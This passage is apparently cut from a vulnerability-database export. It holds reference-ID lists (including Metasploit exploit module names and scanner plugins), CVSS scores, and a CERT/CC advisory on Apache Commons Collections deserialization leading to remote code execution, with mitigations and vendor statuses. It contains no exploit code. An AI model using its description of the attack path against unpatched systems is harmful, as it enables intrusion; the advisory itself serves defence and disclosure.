"E19B380C2BF0F26DFDCBADD37C1B7D4A13ED463E7B4B4ECE7EEEC8895D5690CB", "E3BAE9A30B20D04512C7C16881BAE14D80726FD5F24F3B32C3DF1C51B000477A", "E54048B186E2B0430A492A11B734CD6DBAB437E3800A622970DF288484B9F9CA", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E9094C448DDFA53F1801F49370E9B1301873155775CFD8E4A6A53500E27FBB43", "EC04C84423EE0C4E734038A3305029BA46FF47C7662107F5FFC07C3ACF2F1F61", "F665A1245FF1694ED9B578D35C955B51DAA051F90350DA793AFAC0D05F2DCC0B", "F8AD49D8A73BB530C15AF495227B6C3747AE0CF3ACDA4A23CB12ECAB9ECF5B62", "F9ADD5C0B29D5EA4036B7F3A5477FA4502428CD7F7F7ABD1AF85EE16C6650D8F", "FCF66C1A96FDC8625BB9D927E042CEAA982B68F998C9AFCE8CBB28E803F9F816"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7314019160937441300", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2015-0296", "MGASA-2016-0012", "MGASA-2016-0090", "MGASA-2016-0137", "MGASA-2016-0149", "MGASA-2016-0406", "MGASA-2016-0417", "MGASA-2017-0333"]}, {"type": "malwarebytes", 
"idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-MISC-JENKINS_JAVA_DESERIALIZE-", "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_REST_XSTREAM-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201672113", "MYHACK58:62201681747", "MYHACK58:62201783274", "MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784367", "MYHACK58:62201784379", "MYHACK58:62201785037", "MYHACK58:62201785372", "MYHACK58:62201785395", "MYHACK58:62201786819", "MYHACK58:62201789104", "MYHACK58:62201789628", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "700653.PRM", "700668.PASL", "700699.PASL", "9080.PRM", "9315.PRM", "9323.PRM", "9448.PRM", "9666.PRM", "9667.PRM", "9668.PRM", "9669.PRM", "9670.PRM", "9906.PASL", "ACTIVEMQ_5_13_0.NASL", "ACTIVEMQ_5_15_5.NASL", "AIX_JAVA_APRIL2016_ADVISORY.NASL", "ALA_ALAS-2015-618.NASL", "ALA_ALAS-2016-679.NASL", "ALA_ALAS-2016-680.NASL", "ALA_ALAS-2016-681.NASL", "ALA_ALAS-2016-688.NASL", "ALA_ALAS-2016-693.NASL", "ALA_ALAS-2016-700.NASL", "ALA_ALAS-2016-776.NASL", "ALA_ALAS-2016-777.NASL", "ALA_ALAS-2016-778.NASL", "ALA_ALAS-2022-1562.NASL", "BAMBOO_5_8_5.NASL", "CENTOS_RHSA-2015-2521.NASL", "CENTOS_RHSA-2015-2522.NASL", "CENTOS_RHSA-2015-2671.NASL", "CENTOS_RHSA-2016-0650.NASL", "CENTOS_RHSA-2016-0651.NASL", "CENTOS_RHSA-2016-0675.NASL", "CENTOS_RHSA-2016-0676.NASL", "CENTOS_RHSA-2016-0723.NASL", "CENTOS_RHSA-2016-2045.NASL", "CENTOS_RHSA-2016-2599.NASL", "CENTOS_RHSA-2017-2423.NASL", "CENTOS_RHSA-2017-2486.NASL", "CISCO_CUCM_CSCUX34835.NASL", "CISCO_PRIME_INFRASTRUCTURE_20161291.NASL", "CISCO_PRIME_LMS_JAVA_DESER.NASL", "CISCO_SECURITY_JAVA_DESER.NASL", "COLDFUSION_AMF_DESERIALIZATION.NASL", "COLDFUSION_WIN_APSB17-14.NASL", "COLDFUSION_WIN_APSB17-30.NASL", "DEBIAN_DLA-274.NASL", 
"DEBIAN_DLA-435.NASL", "DEBIAN_DLA-443.NASL", "DEBIAN_DLA-451.NASL", "DEBIAN_DLA-728.NASL", "DEBIAN_DLA-729.NASL", "DEBIAN_DSA-3504.NASL", "DEBIAN_DSA-3524.NASL", "DEBIAN_DSA-3530.NASL", "DEBIAN_DSA-3552.NASL", "DEBIAN_DSA-3558.NASL", "DEBIAN_DSA-3609.NASL", "DEBIAN_DSA-3738.NASL", "DEBIAN_DSA-3739.NASL", "EULEROS_SA-2016-1015.NASL", "EULEROS_SA-2016-1054.NASL", "EULEROS_SA-2017-1213.NASL", "EULEROS_SA-2017-1214.NASL", "F5_BIGIP_SOL30518307.NASL", "F5_BIGIP_SOL58084500.NASL", "F5_BIGIP_SOL73112451.NASL", "FEDORA_2015-15899.NASL", "FEDORA_2015-15907.NASL", "FEDORA_2015-7CA4368B0C.NASL", "FEDORA_2015-EEFC5A6762.NASL", "FEDORA_2016-005AC9CFD5.NASL", "FEDORA_2016-0F490EEA10.NASL", "FEDORA_2016-368780879D.NASL", "FEDORA_2016-641C8B4EB2.NASL", "FEDORA_2016-6CF17AD0DF.NASL", "FEDORA_2016-93679A91DF.NASL", "FEDORA_2016-98CCA07999.NASL", "FEDORA_2016-9C33466FBB.NASL", "FEDORA_2016-A98C560116.NASL", "FEDORA_2016-F099190FEE.NASL", "FEDORA_2017-11EDC0D6C3.NASL", "FEDORA_2017-2CCFBD650A.NASL", "FEDORA_2017-511EBFA8A3.NASL", "FEDORA_2017-6A0389A6A7.NASL", "FEDORA_2017-7E0FF7F73A.NASL", "FEDORA_2017-8348115ACD.NASL", "FEDORA_2017-9899ABA20E.NASL", "FEDORA_2017-B8358CDA24.NASL", "FEDORA_2018-639385F5EC.NASL", "FREEBSD_PKG_0B9AF110D52911E6AE1B002590263BF5.NASL", "FREEBSD_PKG_1F1124FEDE5C11E58FA814DAE9D210B8.NASL", "FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL", "FREEBSD_PKG_4AF92A40DB3311E6AE1B002590263BF5.NASL", "FREEBSD_PKG_5CFA9D0C73D74642AF4F28FBED9E9404.NASL", "FREEBSD_PKG_631C47109BE54A809310EB2847FE24DD.NASL", "FREEBSD_PKG_67B3FEF22BEA11E586FF14DAE9D210B8.NASL", "FREEBSD_PKG_7E01DF39DB7E11E5B93700E0814CAB4E.NASL", "FREEBSD_PKG_8C2B2F110EBE11E6B55EB499BAEBFEAF.NASL", "FREEBSD_PKG_9E5BBFFCD8AC11E5B2BD002590263BF5.NASL", "FREEBSD_PKG_A258604DF2AA11E5B4A9AC220BDCEC59.NASL", "GENTOO_GLSA-201606-18.NASL", "GENTOO_GLSA-201607-17.NASL", "GENTOO_GLSA-201610-01.NASL", "GENTOO_GLSA-201705-09.NASL", "HP_IMC_CVE-2016-4372.NBIN", "HP_INTELLIGENT_MANAGEMENT_CENTER_7_2.NASL", 
"HP_NETWORK_AUTOMATION_HPSBGN03649.NASL", "HP_OPERATIONS_MANAGER_FOR_WIN_CVE-2016-1985_LOCAL.NASL", "HP_OPERATIONS_ORCHESTRATION_HPSBGN03560.NASL", "IBM_JAVA_2016_04_19.NASL", "JBOSS_EAP_DOFILTER_RCE.NBIN", "JBOSS_JAVA_SERIALIZE.NASL", "JENKINS_1_650.NASL", "JENKINS_2_57.NASL", "JENKINS_SECURITY218.NASL", "JENKINS_SECURITY232.NASL", "JENKINS_SECURITY_ADVISORY_2017-02-01.NASL", "JUNIPER_SPACE_JSA_10838.NASL", "LEXMARK_MARKVISION_ENTERPRISE_2016_1487.NASL", "MCAFEE_EPO_SB10144.NASL", "MYSQL_ENTERPRISE_MONITOR_3_0_26.NASL", "MYSQL_ENTERPRISE_MONITOR_3_1_5_7958.NASL", "MYSQL_ENTERPRISE_MONITOR_3_1_6_7959.NASL", "MYSQL_ENTERPRISE_MONITOR_3_2_2_1075.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "MYSQL_ENTERPRISE_MONITOR_3_4_8.NASL", "OPENSUSE-2016-1455.NASL", "OPENSUSE-2016-1456.NASL", "OPENSUSE-2016-351.NASL", "OPENSUSE-2016-370.NASL", "OPENSUSE-2016-384.NASL", "OPENSUSE-2016-553.NASL", "OPENSUSE-2016-554.NASL", "OPENSUSE-2016-560.NASL", "OPENSUSE-2016-572.NASL", "OPENSUSE-2016-573.NASL", "ORACLELINUX_ELSA-2015-2521.NASL", "ORACLELINUX_ELSA-2015-2522.NASL", "ORACLELINUX_ELSA-2015-2671.NASL", "ORACLELINUX_ELSA-2016-0650.NASL", "ORACLELINUX_ELSA-2016-0651.NASL", "ORACLELINUX_ELSA-2016-0675.NASL", "ORACLELINUX_ELSA-2016-0676.NASL", "ORACLELINUX_ELSA-2016-0723.NASL", "ORACLELINUX_ELSA-2016-2045.NASL", "ORACLELINUX_ELSA-2016-2599.NASL", "ORACLELINUX_ELSA-2017-2423.NASL", "ORACLELINUX_ELSA-2017-2486.NASL", "ORACLELINUX_ELSA-2022-9419.NASL", "ORACLE_BI_PUBLISHER_APR_2018_CPU.NASL", "ORACLE_BI_PUBLISHER_OCT_2017_CPU.NASL", "ORACLE_BI_PUBLISHER_OCT_2018_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2018_CPU.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_JAN_2019.NASL", "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_JAN_2018.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_OCT_2018.NASL", "ORACLE_JAVA_CPU_APR_2016.NASL", "ORACLE_JAVA_CPU_APR_2016_UNIX.NASL", "ORACLE_JROCKIT_CPU_APR_2016.NASL", 
"ORACLE_OATS_CPU_APR_2016.NASL", "ORACLE_OATS_CPU_JUL_2018.NASL", "ORACLE_OATS_CPU_JUL_2020.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "ORACLE_RDBMS_CPU_OCT_2017.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2017_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_JAN_2018_CPU.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_APR_2018.NBIN", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2018.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2016.NBIN", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2020.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2016.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "ORACLE_WEBLOGIC_SERVER_CVE_2015_4852.NBIN", "REDHAT-RHSA-2015-2500.NASL", "REDHAT-RHSA-2015-2521.NASL", "REDHAT-RHSA-2015-2522.NASL", "REDHAT-RHSA-2015-2535.NASL", "REDHAT-RHSA-2015-2536.NASL", "REDHAT-RHSA-2015-2538.NASL", "REDHAT-RHSA-2015-2539.NASL", "REDHAT-RHSA-2015-2540.NASL", "REDHAT-RHSA-2015-2542.NASL", "REDHAT-RHSA-2015-2671.NASL", "REDHAT-RHSA-2016-0070.NASL", "REDHAT-RHSA-2016-0489.NASL", "REDHAT-RHSA-2016-0650.NASL", "REDHAT-RHSA-2016-0651.NASL", "REDHAT-RHSA-2016-0675.NASL", "REDHAT-RHSA-2016-0676.NASL", "REDHAT-RHSA-2016-0677.NASL", "REDHAT-RHSA-2016-0678.NASL", "REDHAT-RHSA-2016-0679.NASL", "REDHAT-RHSA-2016-0701.NASL", "REDHAT-RHSA-2016-0702.NASL", "REDHAT-RHSA-2016-0708.NASL", "REDHAT-RHSA-2016-0711.NASL", "REDHAT-RHSA-2016-0716.NASL", "REDHAT-RHSA-2016-0723.NASL", "REDHAT-RHSA-2016-1039.NASL", "REDHAT-RHSA-2016-1087.NASL", "REDHAT-RHSA-2016-1088.NASL", "REDHAT-RHSA-2016-1430.NASL", "REDHAT-RHSA-2016-1773.NASL", "REDHAT-RHSA-2016-2045.NASL", "REDHAT-RHSA-2016-2599.NASL", "REDHAT-RHSA-2016-2807.NASL", "REDHAT-RHSA-2017-0455.NASL", "REDHAT-RHSA-2017-0456.NASL", "REDHAT-RHSA-2017-1216.NASL", "REDHAT-RHSA-2017-1253.NASL", "REDHAT-RHSA-2017-1254.NASL", "REDHAT-RHSA-2017-1256.NASL", "REDHAT-RHSA-2017-1260.NASL", "REDHAT-RHSA-2017-1410.NASL", 
"REDHAT-RHSA-2017-1411.NASL", "REDHAT-RHSA-2017-1412.NASL", "REDHAT-RHSA-2017-1801.NASL", "REDHAT-RHSA-2017-2423.NASL", "REDHAT-RHSA-2017-2486.NASL", "REDHAT-RHSA-2017-2635.NASL", "REDHAT-RHSA-2017-2636.NASL", "REDHAT-RHSA-2017-2637.NASL", "REDHAT-RHSA-2017-2638.NASL", "REDHAT-RHSA-2017-2808.NASL", "REDHAT-RHSA-2017-2809.NASL", "REDHAT-RHSA-2017-2811.NASL", "REDHAT-RHSA-2017-3399.NASL", "REDHAT-RHSA-2018-1607.NASL", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SL_20151130_APACHE_COMMONS_COLLECTIONS_ON_SL7_X.NASL", "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "SL_20151221_JAKARTA_COMMONS_COLLECTIONS_ON_SL5_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL6_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL7_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SL_20160509_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "SL_20161010_TOMCAT6_ON_SL6_X.NASL", "SL_20161103_TOMCAT_ON_SL7_X.NASL", "SL_20170807_LOG4J_ON_SL7_X.NASL", "SOLARWINDS_VIRTUALIZATION_MANAGER_RMI_DESERIALIZATION.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_13.NASL", "STRUTS_2_5_13_REST_RCE.NASL", "SUN_JAVA_WEB_SERVER_7_0_27.NASL", "SUSE_SU-2016-1248-1.NASL", "SUSE_SU-2016-1250-1.NASL", "SUSE_SU-2016-1299-1.NASL", "SUSE_SU-2016-1300-1.NASL", "SUSE_SU-2016-1303-1.NASL", "SUSE_SU-2016-1378-1.NASL", "SUSE_SU-2016-1379-1.NASL", "SUSE_SU-2016-1388-1.NASL", "SYMANTEC_ENDPOINT_PROT_MGR_SYM15-011.NASL", "TOMCAT_6_0_45.NASL", "TOMCAT_7_0_68.NASL", "TOMCAT_8_0_32.NASL", "TOMCAT_8_5_8.NASL", "TOMCAT_9_0_0_M3.NASL", "UBUNTU_USN-2923-1.NASL", "UBUNTU_USN-2963-1.NASL", "UBUNTU_USN-2964-1.NASL", "UBUNTU_USN-2972-1.NASL", "UBUNTU_USN-3024-1.NASL", "UBUNTU_USN-3177-1.NASL", "UBUNTU_USN-3177-2.NASL", "UBUNTU_USN-4557-1.NASL", "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2015_0009.NASL", "VMWARE_ORCHESTRATOR_VMSA_2015_0009.NASL", "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL", "VMWARE_VCENTER_VMSA-2016-0005.NASL", 
"VMWARE_VCENTER_VMSA-2017-0007.NASL", "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_V640_DESERIALIZATION.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL", "WEBLOGIC_2015_4852.NASL", "WEBLOGIC_2017_10271.NASL", "WEBSPHERE_JAVA_SERIALIZE.NASL", "WEBSPHERE_MQ_SWG21982566.NASL", "WEB_APPLICATION_SCANNING_112726", "WEB_APPLICATION_SCANNING_112763"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105615", "OPENVAS:1361412562310105731", "OPENVAS:1361412562310105765", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310105828", "OPENVAS:1361412562310105829", "OPENVAS:1361412562310105830", "OPENVAS:1361412562310105835", "OPENVAS:1361412562310105838", "OPENVAS:1361412562310106144", "OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310107156", "OPENVAS:1361412562310107157", "OPENVAS:1361412562310108062", "OPENVAS:1361412562310108063", "OPENVAS:1361412562310108067", "OPENVAS:1361412562310108095", "OPENVAS:1361412562310108096", "OPENVAS:1361412562310108388", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310113012", "OPENVAS:1361412562310120608", "OPENVAS:1361412562310120669", "OPENVAS:1361412562310120670", "OPENVAS:1361412562310120671", "OPENVAS:1361412562310120678", "OPENVAS:1361412562310120682", "OPENVAS:1361412562310120689", "OPENVAS:1361412562310122791", "OPENVAS:1361412562310122792", "OPENVAS:1361412562310122934", "OPENVAS:1361412562310122935", "OPENVAS:1361412562310122936", "OPENVAS:1361412562310122937", "OPENVAS:1361412562310130082", "OPENVAS:1361412562310131177", "OPENVAS:1361412562310131247", "OPENVAS:1361412562310131300", "OPENVAS:1361412562310131309", "OPENVAS:1361412562310140063", "OPENVAS:1361412562310140180", 
"OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310140254", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310703504", "OPENVAS:1361412562310703524", "OPENVAS:1361412562310703530", "OPENVAS:1361412562310703552", "OPENVAS:1361412562310703558", "OPENVAS:1361412562310703609", "OPENVAS:1361412562310703738", "OPENVAS:1361412562310703739", "OPENVAS:1361412562310806571", "OPENVAS:1361412562310806622", "OPENVAS:1361412562310806624", "OPENVAS:1361412562310806913", "OPENVAS:1361412562310807001", "OPENVAS:1361412562310807275", "OPENVAS:1361412562310807331", "OPENVAS:1361412562310807332", "OPENVAS:1361412562310807351", "OPENVAS:1361412562310807408", "OPENVAS:1361412562310807415", "OPENVAS:1361412562310807551", "OPENVAS:1361412562310807701", "OPENVAS:1361412562310807702", "OPENVAS:1361412562310807703", "OPENVAS:1361412562310807707", "OPENVAS:1361412562310807907", "OPENVAS:1361412562310807933", "OPENVAS:1361412562310808269", "OPENVAS:1361412562310809026", "OPENVAS:1361412562310809053", "OPENVAS:1361412562310809055", "OPENVAS:1361412562310809062", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310810938", "OPENVAS:1361412562310810965", "OPENVAS:1361412562310810966", "OPENVAS:1361412562310811005", "OPENVAS:1361412562310811006", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811696", "OPENVAS:1361412562310811730", "OPENVAS:1361412562310811871", "OPENVAS:1361412562310813537", "OPENVAS:1361412562310814409", "OPENVAS:1361412562310842680", "OPENVAS:1361412562310842733", "OPENVAS:1361412562310842745", "OPENVAS:1361412562310842764", "OPENVAS:1361412562310842823", "OPENVAS:1361412562310843024", "OPENVAS:1361412562310843035", "OPENVAS:1361412562310851239", "OPENVAS:1361412562310851245", "OPENVAS:1361412562310851252", "OPENVAS:1361412562310851257", "OPENVAS:1361412562310851291", "OPENVAS:1361412562310851292", "OPENVAS:1361412562310851293", "OPENVAS:1361412562310851302", "OPENVAS:1361412562310851303", "OPENVAS:1361412562310851306", 
"OPENVAS:1361412562310851311"]}]}, "score": {"value": 10.0, "vector": "NONE"}, "exploitation": null, "vulnersScore": 10.0}, "published": "2018-01-24T17:45:08", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "edition": 2, "scheme": null, "_state": {"dependencies": 1660012827, "score": 1683966290, "epss": 1678853679}, "_internal": {"score_hash": "4a3c9dbcc65df79dd05001ea5a72768c"}}
{"cert": [{"lastseen": "2023-07-19T20:16:07", "description": "### Overview\n\nThe Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Java applications that either directly use ACC, or contain ACC in their classpath, may be vulnerable to arbitrary code execution.\n\n### Description\n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data - **CVE-2015-6420\n\nIn January 2015, at AppSec California 2015, researchers [Gabriel Lawrence and Chris Frohoff](<http://frohoff.github.io/appseccali-marshalling-pickles/>) described how many Java applications and libraries using Java Object Serialization may be vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Any Java library or application that utilizes this functionality incorrectly may be impacted by this vulnerability. \n \nIn November 2015, [Stephen Breen of Foxglove Security](<http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>) identified the [Apache Commons Collections](<https://commons.apache.org/proper/commons-collections/>) (ACC) Java library as being vulnerable to insecure deserialization of data; specifically, the ACC `InvokerTransformer` class may allow arbitrary code execution when used to deserialize data from untrusted sources. According to the researcher, this issue affects several large projects that utilize ACC including WebSphere, JBoss, [Jenkins](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>), [WebLogic](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179>), and OpenNMS. Unify also reports that [OpenScape](<https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>) software is affected. 
In addition, [Cisco](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20>) has released an advisory for their products. \n \nBoth [versions 3.2.1 and 4.0](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) of the Apache Commons Collections library have been identified as being vulnerable to this deserialization issue. \n \nThe Apache Software Foundation has released a [statement](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) regarding this issue, which contains advice for mitigating the issue, as well as further references and links. A [bug](<https://issues.apache.org/jira/browse/COLLECTIONS-580>) tracker entry has been filed to track progress toward a full solution. \n \nOther libraries, such as Groovy and Spring, are currently being investigated for similar flaws. Lawrence and Frohoff's presentation describes how applications and libraries written in other languages, such as Python and Ruby, may also be vulnerable to the same type of issue. It is generally up to software designers to follow best practices for security when handling serialized data, no matter the programming language or library used. \n \n--- \n \n### Impact\n\nA Java application or library with the Apache Commons Collections library in its classpath may be coerced into executing arbitrary Java functions or bytecode. \n \nWhile many applications do not actively use serialization or deserialization, they often rely on libraries that do. If a class uses deserialization on some input stream (either a file or socket), and an attacker can send malicious data down that stream, the attacker can cause the program to construct objects of any class on its classpath (whether it uses those classes or not). And some classes, such as those in the ACC, automatically execute code based on attacker-supplied deserialization input. 
\n \nAn application that neither uses deserialization, nor employs any libraries that use deserialization, would not be vulnerable to this problem. Such an application should also lack a plugin architecture, or any mechanism for loading code that might use deserialization. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of a full solution to this problem, but you may consider the following: \n \n**Apply an update** \n \nApache Commons Collections [version 3.2.2](<https://commons.apache.org/proper/commons-collections/download_collections.cgi>) and [version 4.1](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) have been released. These new releases mitigate the vulnerability by disabling the insecure functionality. \n \n**Developers need to re-architect their applications, and should be suspicious of deserialized data from untrusted sources** \n \nDevelopers will need to make further architectural changes to secure their applications before they can re-enable functionality in ACC version 3.2.2 and later. From Apache's statement: \n \n_However, to be clear: this is not the only known and especially not unknown useable gadget. So replacing your installations with a hardened version of Apache Commons Collections will not make your application resist this vulnerability. _ \n \nDevelopers should in general be very suspicious of deserialized data from an untrusted source. For best practices, see the [CERT Oracle Coding Standard for Java](<https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>) guidelines for Serialization, especially rules [SER12-J](<https://www.securecoding.cert.org/confluence/display/java/SER12-J.+Prevent+deserialization+of+untrusted+classes>) and [SER13-J](<https://www.securecoding.cert.org/confluence/display/java/SER13-J.+Treat+data+to+be+deserialized+as+potentially+malicious+by+default>). 
\n \n**Use firewall rules or filesystem restrictions** \n \nSystem administrators may be able to mitigate this issue for some applications by restricting access to the network and/or filesystem. If an affected application, such as Jenkins, utilizes an open port accepting serialized objects, restricting access to the application may help mitigate the issue. \n \n--- \n \n### Vendor Information\n\n576313\n\n### Apache Software Foundation Affected\n\nUpdated: November 10, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cisco __ Affected\n\nUpdated: July 18, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nCisco has released a [security advisory](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>) and list of affected products at the URL below. Cisco has assigned CVE-2015-6420 to this issue.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n\n### Addendum\n\nAs of 2017-07-18, CERT/CC is aware of a report that Cisco Unity Express (CUE) 8.6.1 is still vulnerable to this issue and is incorrectly identified as \"not vulnerable\" in the above Cisco advisory. 
We have reached out to Cisco for clarification.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23576313 Feedback>).\n\n### IBM Corporation __ Affected\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nIBM has released a security advisory for WebSphere at the following URL:\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n### Jenkins __ Affected\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nJenkins has released a security advisory at the URL below. CVE-2015-8103 was assigned this issue in Jenkins.\n\n### Vendor References\n\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n\n### Oracle Corporation __ Affected\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOracle has released a security advisory at the URL below:\n\n### Vendor References\n\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179\n>)\n * <https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852>\n\n### Unify Inc __ Affected\n\nUpdated: November 30, 2015 \n\n**Statement Date: November 24, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"Unify is affected in two product lines as listed below. 
